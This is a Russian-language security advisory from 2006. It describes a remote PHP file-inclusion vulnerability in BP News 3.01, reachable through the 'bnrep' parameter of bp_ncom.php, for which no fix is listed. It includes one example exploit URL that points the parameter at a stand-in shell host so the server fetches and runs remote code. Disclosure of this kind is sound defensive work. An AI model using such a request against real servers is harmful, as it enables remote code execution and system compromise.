PHP-инклюдинг в BP News

Дата публикации:
08.09.2006
Дата изменения:
17.10.2006
Всего просмотров:
8404
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
BP News 3.x
Уязвимые версии: BP News 3.01, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "bnrep" в сценарии bp_ncom.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://[host]/[Script Path]/bp_ncom.php?bnrep=http://SHELLURL.COM?

URL производителя: bingophp.free.fr

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: BinGo News <= 3.01 (bnrep) Remote File Include Vulnerability

или введите имя

CAPTCHA